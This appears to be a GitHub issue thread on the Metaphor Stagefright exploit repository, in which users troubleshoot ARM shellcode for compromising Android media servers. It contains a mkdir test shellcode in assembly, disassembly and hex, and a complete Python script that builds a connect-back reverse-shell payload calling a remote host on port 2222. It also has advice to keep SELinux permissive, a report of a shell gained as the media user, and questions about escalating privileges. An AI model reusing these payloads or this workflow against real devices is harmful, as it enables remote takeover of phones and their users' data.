search

NorthBit / Metaphor

Metaphor - Stagefright with ASLR bypass
GNU General Public License v3.0
312 stars 110 forks source link

Something about Shellcode #8

Open 3kyo0 opened 8 years ago

3kyo0 commented 8 years ago

shellcode.s .globl _start .align 2 _start: .code 32 adr r0,filename adr r1,mode mov r7, #39 swi #0 @mkdir(filename,mode) mov r0, #0 mov r7, #1 swi #0 @exit(0) mode: .short 0x1ff filename: .asciz "/data/local/tmp/success"

shellcode disassemble: .text:00008074 ; Segment type: Pure code .text:00008074 AREA .text, CODE .text:00008074 ; ORG 0x8074 .text:00008074 CODE32 .text:00008074 .text:00008074 EXPORT _start .text:00008074 _start ; "/data/local/tmp/success" .text:00008074 ADR R0, filename .text:00008078 ADR R1, mode .text:0000807C MOV R7, #0x27 .text:00008080 SVC 0 .text:00008084 MOV R0, #0 .text:00008088 MOV R7, #1 .text:0000808C SVC 0 .text:0000808C ; --------------------------------------------------------------------------- .text:00008090 mode DCW 0x1FF ; DATA XREF: .text:00008078o .text:00008092 filename DCB "/data/local/tmp/success",0 ; DATA XREF: .text:_starto .text:000080AA DCW 0 .text:000080AA ; .text ends

shellcode.bin 16 00 8F E2 10 10 8F E2 27 70 A0 E3 00 00 00 EF 00 00 A0 E3 01 70 A0 E3 00 00 00 EF FF 01 2F 64 61 74 61 2F 6C 6F 63 61 6C 2F 74 6D 70 2F 73 75 63 63 65 73 73 00 00 00

could you tell me why my shellcode doesn't work? could you help me?

3kyo0 commented 8 years ago

the problem has been solved, thank you for sharing the code

3kyo0 commented 8 years ago

another problem: F/libc ( 7739): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 7770 (Bind er_2)

TirelessMan commented 8 years ago

Hi Coodea, I am going change the Metaphor shell code with another one, But this need I develop a new shell code with ARM instruction. I can not find a shell code on the internet also. Can you please upload/send/share your own shell code with me? Your shellcode.bin at the first comment seems dose not work and then you have resolved thats problem, can I have your shell code please? Or how can I develop my own shell code with ARM instruments? any source any references? thanks in advance

3kyo0 commented 8 years ago

https://www.exploit-db.com/exploits/38124/ shellcode you can find selinux must be Permissive

3kyo0 commented 8 years ago

i have got a shell id uid=1013(media) gid=1005(audio) groups=1006(camera),1026(drmrpc),1031(mediadrm),3001(n et_bt_admin),3002(net_bt),3003(inet),3007(net_bw_acct) context=u:r:mediaserver:s0

but another problems come.How to Privilege by mediaserver

secmart commented 8 years ago

Hi Coodea,

how did you export only the shellcode from the python file? As for my understanding the shellcode generates with the function "def build_rop" So I tried to write the variable "buf" to a file. I also tried it with "rop" but both shellcodes didn't work in my exploit. Can you explain in more detail how you get the shellcode? thanks in advance

3kyo0 commented 8 years ago

import struct import socket cb_port=2222 cb_host="192.168.1.128" buf='' buf += '\x02\x70\xa0\xe3' buf += '\x00\x00\x00\xef'

continue if not parent

buf += '\x00\x00\x50\xe3' buf += '\x02\x00\x00\x0a'

exit parent

buf += '\x00\x00\xa0\xe3' buf += '\x01\x70\xa0\xe3' buf += '\x00\x00\x00\xef'

setsid in child

buf += '\x42\x70\xa0\xe3' buf += '\x00\x00\x00\xef'

socket/connect/dup2/dup2/dup2

buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c' buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60' buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0' buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1' buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06' buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00' buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0' buf += '\xe3\x00\x00\x00\xef'

execve(shell, argv, env)

buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0' buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d' buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00' buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00' buf += '\xef\x02\x00'

Add the connect back host/port

buf += struct.pack('!H', cb_port) cb_host = socket.inet_aton(cb_host) buf += struct.pack('=4s', cb_host)

shell

buf += '/system/bin/sh\x00\x00'

argv

buf += 'sh\x00\x00'

env

buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'

with open('p2222.bin','wb') as f: f.write(buf)

secmart commented 8 years ago

Hi Coodea,

thx for your answer. I build the shellcode and put it on the web server. Now the client connect to my server but the session gets closed immediately. I tried it with ncat under kali. There i got the message "Ncat: Connection from ...." and in the same second ncat stopps. I also tried metasploit with the payload android/meterpreter/reverse_tcp, there nothing happens. With which tool did you listen to your port to get the remote shell? How did you compile the python file? Did you compile it under your normal OS system or did you change something that it will work on arm processors? thanks in advance

3kyo0 commented 8 years ago

keep selinux Permissive

TirelessMan commented 8 years ago

Hi, Thanks 3kyo0 for your shell code, Now I can run the shell code on the target device :), but I can not do some tasks such as creating a file or directory on the target with my shell code! As my shell code runs in media server process permissions, I am so limited on executing commands :(. Question: How can I find media server process permissions? How can I know which permissions media server process has? Thanks in advance